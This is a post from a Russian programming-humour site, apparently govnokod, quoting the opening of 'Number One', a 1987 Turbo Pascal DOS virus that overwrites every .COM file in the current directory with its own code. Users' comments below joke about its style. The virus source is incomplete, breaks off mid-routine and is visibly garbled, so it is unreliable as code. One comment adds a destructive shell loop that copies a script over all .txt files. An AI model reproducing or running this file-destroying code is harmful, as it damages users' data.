1. Pascal / Говнокод #10538

    +94

    1. 001
    2. 002
    3. 003
    4. 004
    5. 005
    6. 006
    7. 007
    8. 008
    9. 009
    10. 010
    11. 011
    12. 012
    13. 013
    14. 014
    15. 015
    16. 016
    17. 017
    18. 018
    19. 019
    20. 020
    21. 021
    22. 022
    23. 023
    24. 024
    25. 025
    26. 026
    27. 027
    28. 028
    29. 029
    30. 030
    31. 031
    32. 032
    33. 033
    34. 034
    35. 035
    36. 036
    37. 037
    38. 038
    39. 039
    40. 040
    41. 041
    42. 042
    43. 043
    44. 044
    45. 045
    46. 046
    47. 047
    48. 048
    49. 049
    50. 050
    51. 051
    52. 052
    53. 053
    54. 054
    55. 055
    56. 056
    57. 057
    58. 058
    59. 059
    60. 060
    61. 061
    62. 062
    63. 063
    64. 064
    65. 065
    66. 066
    67. 067
    68. 068
    69. 069
    70. 070
    71. 071
    72. 072
    73. 073
    74. 074
    75. 075
    76. 076
    77. 077
    78. 078
    79. 079
    80. 080
    81. 081
    82. 082
    83. 083
    84. 084
    85. 085
    86. 086
    87. 087
    88. 088
    89. 089
    90. 090
    91. 091
    92. 092
    93. 093
    94. 094
    95. 095
    96. 096
    97. 097
    98. 098
    99. 099
    100. 100
    {
    -----------------------------------------------------------------
    
    Number One
    
    This is a very primitiv computer virus.
    
    HANDLE WITH CARE! ----------- demonstration ONLY!
    
    Number One infect all.COM-file in the CURRENT directory.
    A warning message and the infected file's name will be displayed.
    That file has been overwritten with Number One's programm
    code and is not reconstructable!
    If all file s are infected or no .COM-files found, Number
    One gives you a .
    Files may be protected against infections of Number One by
    setting the READ ONLY attribute.
    Written 10.3.1987 by M.Vallen (Turbo-Pascal 3.01a)
    (c) 1987 by BrainLab
    ---------------------------------------------------------------------
    }
    {C-}
    {U-}
    {I-} { Do not allow an user Break, enable 10 check}
    {--Constants----------------------------------------------------}
    Const
    VirusSize = 12027; { Number One's code size }
    Warning : String [42] { Warning massage }
    = 'This file has been infected by Number One's;
    
    {--Type declaration----------------------------------------------}
    Type
    DTARec = Record { Date area for }
    DOSnext : Array 1...21 of Byte; { file search }
    Attr : Byte;
    FTime,
    FDate,
    FLsize,
    FHsize : Integer;
    FullName : Array 1...13 of Char;
    End;
    Registers = Record {Register set useed for file search}
    Case Byte of
    1: ( AX, BX, CX, DX, BP, SI, DI, DS, ES,Flags: Integer);
    2: ( AL, AH, BL, BH, CL, CH, DL, DH : Byte);
    End;
    {--Variables------------------------------------------------------}
    Var
    ProgramStart : Byte absolute Cseg: $180; {Memory offset of program code}
    {Infection marker}
    
    MarkInfected : String 42 absolute Cseg: $180;
    Reg : Register; { Register set}
    DTA : DTARec; { Date area}
    
    Buffer :Array [Byte] of Byte; { Date buffer}
    TestID : String 42; {To recognize infected files}
    UsePath : String 66; { Path to search files}
    {Length of search path}
    UsePathLength: Byte absolute UsePath;
    Go : File; { File to infect}
    B : Byte; { Used }
    
    --Program code-------------------------------------------------------
    
    Begin
    WriteLn(Warning); {Display Warning massage}
    GetDir(0,UsePath); { Get current directory}
    
    if Post ('', UsePath ) <> UsePathLengt then
    UsePath:= UsePath + '';
    UsePath:= UsePath + '*.COM'; { Define search mask}
    Reg.AH := $1A; { Set date area}
    Reg.DS Seg(DTA);
    Reg.DX Ofs(DTA);
    MsDos(Reg);
    UsePath Succ(UsePathLength):=0; Path must end with =0
    Reg.AH := $4e;
    Reg.DS := Seg(UsePath);
    Reg.DX := Ofs(UsePath 1);
    Reg.CX :=$ff; {Set attribut to find ALL files}
    MsDos(Reg); { Find the first matching entry}
    If not Odd(Reg.Flags) Then { If a file found then...}
    Repeat
    UsePath:=DTA.FullName;
    B := Pos(#0,UsePath);
    If B> 0 Then
    Delete (UsePath,B,255); { Remove garbage}
    Assign(Go, UsePath);
    Reset(GO);
    If IOresult=0 {If not error then}
    Begin
    BlockRead(Go,Buffer,2);
    Move(Buffer $80,TestID, 43);
    {Test if file is already infected}
    If TestID<> Warning then { If not, then}
    Begin
    Seek(Go,0);
    {Mark file as infected and...}
    MarkInfected:= Warning;

    http://www.liveinternet.ru/users/gafarov-91/post120984751/

    Первая часть.

    Запостил: dos_, 03 Июня 2012

    Комментарии (17) RSS

    • ты должен мне новые глаза
      Ответить
    • Классный вирус чо:
      for f in *.txt; do cp $0 $f; done

      > Display Warning massage
      Предупредительный массаж

      > MsDos(Reg);
      Мы не ищем лёгких путей для поиска файлов...
      Ответить
      • Вызов прерываний в ДОСе - это точно то же самое по семантике, что и вызов АПИ-функций под виндой. Так что не вижу особого ужаса.
        Ответить
        • Ну для реализации того чего нет в стандартных библиотеках - конечно все ок.

          Но в турбо-паскалевской либе вроде же есть нормальная апишка для поиска файлов.
          Ответить
          • Точно есть. Так что велосипед.
            Ответить
          • Да какая он нормальная. Возвращала бы array of TFileInfo, была б нормальная, а так те же финдфирст, финднекст, как в чистом винапи, сделай цикл руками, ага.
            Ответить
            • Дык и на асме ее так же вызывают в цикле.

              P.S. А в том паскале разве были array of xxx без указания длины?
              Ответить
              • > А в том паскале разве были array of xxx без указания длины?
                Не было.
                Ответить
            • > Да какая он нормальная. Возвращала бы array of TFileInfo, была б нормальная, а так те же финдфирст, финднекст
              Про паттерн итератора не слышал? Это лень, чтобы память и такты экономить.
              Ответить
              • Если бы в Паскале итератор (т.е. совокупность из старта, действия перехода, условия конца, действия при выходе) была высокоуровневой хернёй с методом foreach и если бы FindFiles возвращала такой итератор, то было бы тоже удобно, да.
                Ответить
        • обертку религия не позволяет сделать?
          только хардкор, только регистры
          и это в зашкаливающе семантичном Паскале, ЛОЛ
          Ответить
          • С обертками не по-хакерски ;)
            Ответить
          • Тут обёртка по сложности ничуть не проще прямого вызова прерывания.
            Для сравнения, узнать координаты мыши на асме - 4 строчки, через библиотечную Intr - чуть ли не вдвое больше.
            Ответить
    • показать все, что скрытоВсем минусы! Всем добра!
      Ответить

    Добавить комментарий